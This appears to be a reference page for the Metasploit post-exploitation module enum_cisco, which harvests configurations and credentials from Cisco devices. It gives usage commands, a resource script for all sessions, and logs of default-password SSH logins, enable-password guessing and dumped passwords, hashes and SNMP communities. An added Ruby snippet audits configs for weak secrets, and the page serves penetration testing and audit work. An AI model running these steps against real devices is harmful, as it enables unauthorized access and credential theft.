Cisco Gather Device General Information - Metasploit


This page contains detailed information about how to use the post/networking/gather/enum_cisco Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Cisco Gather Device General Information
Module: post/networking/gather/enum_cisco
Source code: modules/post/networking/gather/enum_cisco.rb
Disclosure date: -
Last modification time: 2021-05-13 04:01:03 +0000
Supported architecture(s): -
Supported platform(s): Cisco
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module collects device information and the running configuration from a Cisco IOS or NX-OS device.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/networking/gather/enum_cisco

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/networking/gather/enum_cisco
msf post(enum_cisco) > show options
    ... show and set options ...
msf post(enum_cisco) > set SESSION session-id
msf post(enum_cisco) > exploit

If you wish to run the post module against all sessions in the framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/networking/gather/enum_cisco")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Vulnerable Application


This module has been tested on the following hardware/OS combinations.

  • IOS
    • Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13
    • UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2

The Catalyst 2950 config can be found here

The UC520 config can be found here

This module will look for the following configuration parameters, which may contain credentials:

  • IOS
    • enable
    • snmp-server
    • VTY
    • WiFi
    • VPN
    • username
    • PPP
    • web admin
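The following is an added example, not code from the Metasploit module: a small Ruby audit that reads an IOS running-config (a constructed sample, embedded below) and reports how each credential in the enable, username, web admin, snmp-server, VPN and VTY parameters is stored, so that plaintext and type 7 (reversible) secrets can be found and replaced with hashed storage or SNMPv3 before the configuration leaks. The storage labels and the finding format are this example's own conventions, not the module's output.

```ruby
# Added example, not code from the Metasploit module: classify how the
# credential-bearing IOS parameters listed above are stored, so plaintext and
# type 7 (reversible) secrets can be replaced with hashed storage or SNMPv3.
STORAGE = { nil => 'plaintext', '0' => 'plaintext', '7' => 'type7-reversible',
            '5' => 'type5-md5', '8' => 'type8-pbkdf2', '9' => 'type9-scrypt' }.freeze
WEAK = %w[plaintext type7-reversible snmp-cleartext].freeze

def finding(param, name, type, storage = STORAGE.fetch(type, "type#{type}"))
  { param: param, name: name, storage: storage, weak: WEAK.include?(storage) }
end

# Returns one finding per credential line: {param:, name:, storage:, weak:}.
def audit_ios_config(config)
  findings = []
  section = nil # enclosing "line ..." block, needed to attribute VTY passwords
  config.each_line do |raw|
    line = raw.rstrip
    section = nil unless line.start_with?(' ')
    case line
    when /^line (\S+)/ then section = $1
    when /^enable (?:password|secret)\s+(?:(\d) )?\S+/
      findings << finding('enable', 'enable', $1)
    when /^username (\S+) (?:password|secret)\s+(?:(\d) )?\S+/
      findings << finding('username', $1, $2)
    when /^ip http username (\S+) password\s+(?:(\d) )?\S+/
      findings << finding('web admin', $1, $2)
    when /^snmp-server community (\S+)(?:\s+(RO|RW))?/
      findings << finding('snmp-server', "#{$1} (#{$2 || 'RO'})", nil, 'snmp-cleartext')
    when /^crypto isakmp key\s+(?:(\d) )?\S+ address (\S+)/
      findings << finding('VPN', "isakmp key for #{$2}", $1)
    when /^ +password\s+(?:(\d) )?\S+/
      findings << finding('VTY', section, $1) if section.to_s.start_with?('vty')
    end
  end
  findings
end

# Constructed sample config; the type 5 hash is a placeholder, not a real digest.
SAMPLE_CONFIG = <<~'CFG'
  enable password cisco
  username admin password 7 094F471A1A0A
  username ops secret 5 $1$PLCH$placeholderplaceholderpl
  ip http username webadmin password 0 web123
  snmp-server community public RO
  snmp-server community private RW
  crypto isakmp key sharedkey address 203.0.113.5
  line vty 0 4
   password 7 0822455D0A16
   login
CFG
```

Running audit_ios_config(SAMPLE_CONFIG) flags every entry except the type 5 username secret as weak; WiFi and PPP secrets are not parsed by this example.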

Verification Steps


  1. Start msfconsole
  2. Get a shell
  3. Do: use post/networking/gather/enum_cisco
  4. Do: set session [id]
  5. Do: set verbose true
  6. Do: run

Scenarios


Catalyst 2950, C2950-I6K2L2Q4-M, Version 12.1(22)EA13

resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
resource (cisco.rb)> set username cisco
username => cisco
resource (cisco.rb)> set password cisco
password => cisco
resource (cisco.rb)> set rhosts 222.222.2.222
rhosts => 222.222.2.222
resource (cisco.rb)> run
[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
[*] Command shell session 1 opened (111.111.1.111:40721 -> 222.222.2.222:22) at 2019-07-20 16:29:05 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (cisco.rb)> use post/networking/gather/enum_cisco
resource (cisco.rb)> set session 1
session => 1
resource (cisco.rb)> set verbose true
verbose => true
resource (cisco.rb)> set enable enable
enable => enable
resource (cisco.rb)> run
[!] SESSION may not be compatible with this module.
[*] Getting version information
[*] Getting privilege level
[*] The device OS is IOS
[*] Session running in mode EXEC
[*] Privilege level 1
[+] version information stored in to loot, file:/root/.msf4/loot/20190720162921_default_222.222.2.222_cisco.ios.versio_081759.txt
[*] Gathering info from show ip interface brief
[+] Saving to /root/.msf4/loot/20190720162941_default_222.222.2.222_cisco.ios.interf_908844.txt
[*] Gathering info from show inventory
[+] Saving to /root/.msf4/loot/20190720162946_default_222.222.2.222_cisco.ios.hw_inv_152516.txt
[+] Obtained higher privilege level.
[*] Gathering info from show run
[*] Parsing running configuration for credentials and secrets...
[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0
[+] 222.222.2.222:22 Decrypted Enable Password: password
[+] 222.222.2.222:22 Username 'encrypted' with Decrypted Password: encrypted
[+] 222.222.2.222:22 Username 'admin' with Password: admin
[+] 222.222.2.222:22 Username 'cisco' with Password: cisco
[+] 222.222.2.222:22 Unencrypted VTY Password: password
[+] 222.222.2.222:22 Decrypted VTY Password: password
[+] Saving to /root/.msf4/loot/20190720163001_default_222.222.2.222_cisco.ios.run_co_537064.txt
[*] Gathering info from show cdp neigh
[+] Saving to /root/.msf4/loot/20190720163006_default_222.222.2.222_cisco.ios.cdp_ne_989308.txt
[*] Post module execution completed
[*] Starting persistent handler(s)...
msf5 post(networking/gather/enum_cisco) > creds
Credentials
===========

host           origin         service  public     private                         realm  private_type        JtR Format
----           ------         -------  ------     -------                         -----  ------------        ----------
222.222.2.222  222.222.2.222  22/tcp   cisco      cisco                                  Password            
222.222.2.222  222.222.2.222  22/tcp              $1$crRb$AJAfWfnDJ6Kf83o.P4RxU0         Nonreplayable hash  md5
222.222.2.222  222.222.2.222  22/tcp              password                               Password            
222.222.2.222  222.222.2.222  22/tcp   encrypted  encrypted                              Password            
222.222.2.222  222.222.2.222  22/tcp   admin      admin                                  Password            

UC520, UC520-8U-4FXO-K9, Version 12.4(20)T2

[*] Processing cisco.rb for ERB directives.
resource (cisco.rb)> use auxiliary/scanner/ssh/ssh_login
resource (cisco.rb)> set username cisco
username => cisco
resource (cisco.rb)> set password cisco
password => cisco
resource (cisco.rb)> set rhosts 222.222.2.222
rhosts => 222.222.2.222
resource (cisco.rb)> run
[+] 222.222.2.222:22 - Success: 'cisco:cisco' ''
[*] Command shell session 1 opened (111.111.1.111:41839 -> 222.222.2.222:22) at 2019-07-21 16:24:02 -0400
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
resource (cisco.rb)> use post/networking/gather/enum_cisco
resource (cisco.rb)> set session 1
session => 1
resource (cisco.rb)> set verbose true
verbose => true
resource (cisco.rb)> set enable cisco
enable => cisco
resource (cisco.rb)> run
[!] SESSION may not be compatible with this module.
[*] Getting version information
[*] Getting privilege level
[*] The device OS is IOS
[*] Session running in mode EXEC
[*] Privilege level 1
[+] version information stored in to loot, file:/root/.msf4/loot/20190721162417_default_222.222.2.222_cisco.ios.versio_707957.txt
[*] Gathering info from show login
[+] Saving to /root/.msf4/loot/20190721162432_default_222.222.2.222_cisco.ios.login__534767.txt
[*] Gathering info from show ip interface brief
[+] Saving to /root/.msf4/loot/20190721162437_default_222.222.2.222_cisco.ios.interf_310865.txt
[*] Gathering info from show inventory
[+] Saving to /root/.msf4/loot/20190721162443_default_222.222.2.222_cisco.ios.hw_inv_238952.txt
[+] Obtained higher privilege level.
[*] Gathering info from show run
[*] Parsing running configuration for credentials and secrets...
[+] 222.222.2.222:22 MD5 Encrypted Enable Password: $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1
[+] 222.222.2.222:22 Username 'cisco' with MD5 Encrypted Password: $1$DaqN$iP32E5WcOOui/H66R63QB0
[+] 222.222.2.222:22 SNMP Community (RO): public
[+] 222.222.2.222:22 SNMP Community (RW): private
[+] 222.222.2.222:22 Website Username: cisco, of type: system, Password Hash: $1$n/n0$q6wNrBypu0GDpxzfSwGnf1
[+] 222.222.2.222:22 ePhone Username 'phoneone' with Password: 111111
[+] 222.222.2.222:22 ePhone Username 'phonetwo' with Password: 222222
[+] 222.222.2.222:22 ePhone Username 'phonethree' with Password: 333333
[+] 222.222.2.222:22 ePhone Username 'phonefour' with Password: 444444
[+] Saving to /root/.msf4/loot/20190721162458_default_222.222.2.222_cisco.ios.run_co_918487.txt
[*] Gathering info from show cdp neigh
[+] Saving to /root/.msf4/loot/20190721162503_default_222.222.2.222_cisco.ios.cdp_ne_135156.txt
[*] Gathering info from show lldp neigh
[+] Saving to /root/.msf4/loot/20190721162508_default_222.222.2.222_cisco.ios.cdp_ne_405367.txt
[*] Post module execution completed
[*] Starting persistent handler(s)...
msf5 post(networking/gather/enum_cisco) > creds
Credentials
===========

host           origin         service  public      private                         realm  private_type        JtR Format
----           ------         -------  ------      -------                         -----  ------------        ----------
222.222.2.222  222.222.2.222  22/tcp   cisco       $1$n/n0$q6wNrBypu0GDpxzfSwGnf1         Nonreplayable hash  md5
222.222.2.222  222.222.2.222  22/tcp   cisco       $1$DaqN$iP32E5WcOOui/H66R63QB0         Nonreplayable hash  md5
222.222.2.222  222.222.2.222  22/tcp   cisco       cisco                                  Password            
222.222.2.222  222.222.2.222  22/tcp   phoneone    111111                                 Password            
222.222.2.222  222.222.2.222  22/tcp   phonetwo    222222                                 Password            
222.222.2.222  222.222.2.222  22/tcp   phonethree  333333                                 Password            
222.222.2.222  222.222.2.222  22/tcp   phonefour   444444                                 Password            
222.222.2.222  222.222.2.222  161/udp              private                                Password            
222.222.2.222  222.222.2.222  161/udp              public                                 Password            
222.222.2.222  222.222.2.222  22/tcp               $1$TF.y$3E7pZ2szVvQw5JG8SDjNa1         Nonreplayable hash  md5


Msfconsole Usage


Here is how the networking/gather/enum_cisco post exploitation module looks in the msfconsole:

msf6 > use post/networking/gather/enum_cisco

msf6 post(networking/gather/enum_cisco) > show info

       Name: Cisco Gather Device General Information
     Module: post/networking/gather/enum_cisco
   Platform: Cisco
       Arch: 
       Rank: Normal

Provided by:
  Carlos Perez <[email protected]>

Compatible session types:
  Shell

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  ENABLE                     no        Enable password for changing privilege level.
  SESSION                    yes       The session to run this module on.
  WORDLIST                   no        Wordlist of possible enable passwords to try.

Description:
  This module collects a Cisco IOS or NXOS device information and 
  configuration.

Module Options


This is a complete list of options available in the networking/gather/enum_cisco post exploitation module:

msf6 post(networking/gather/enum_cisco) > show options

Module options (post/networking/gather/enum_cisco):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   ENABLE                     no        Enable password for changing privilege level.
   SESSION                    yes       The session to run this module on.
   WORDLIST                   no        Wordlist of possible enable passwords to try.

Advanced Options


Here is a complete list of advanced options supported by the networking/gather/enum_cisco post exploitation module:

msf6 post(networking/gather/enum_cisco) > show advanced

Module advanced options (post/networking/gather/enum_cisco):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the networking/gather/enum_cisco module can do:

msf6 post(networking/gather/enum_cisco) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the networking/gather/enum_cisco post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(networking/gather/enum_cisco) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Error Messages


This module may fail with the following error messages:

Check for the possible causes in the code snippets below, taken from the module source code. This can often help in identifying the root cause of the problem.

Failed to change privilege level using provided Enable password.


Here is a relevant code snippet related to the "Failed to change privilege level using provided Enable password." error message:

if enable_pass
  found = false
  session.shell_command('enable').to_s.strip
  en_out = session.shell_command(enable_pass)
  if en_out =~ /Password:/
    print_error('Failed to change privilege level using provided Enable password.')
  else
    found = true
  end
else
  if pass_file

Wordlist File <PASS_FILE> does not exist!


Here is a relevant code snippet related to the "Wordlist File <PASS_FILE> does not exist!" error message:

    found = true
  end
else
  if pass_file
    if !::File.exist?(pass_file)
      print_error("Wordlist File #{pass_file} does not exist!")
      return
    end
    creds = ::File.open(pass_file, 'rb')
  else
    creds = "Cisco\n" << "cisco\n" << "sanfran\n" << "SanFran\n" << "password\n" << "Password\n"

Could not obtain higher privilege level.


Here is a relevant code snippet related to the "Could not obtain higher privilege level." error message:

  end
  if found
    print_good('Obtained higher privilege level.')
    return true
  else
    print_error('Could not obtain higher privilege level.')
    return false
  end
end

# Run enumeration commands for when privilege level is 7 or 15


See Also


Check also the following modules related to this module:

Authors


  • Carlos Perez <carlos_perez[at]darkoperator.com>

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.
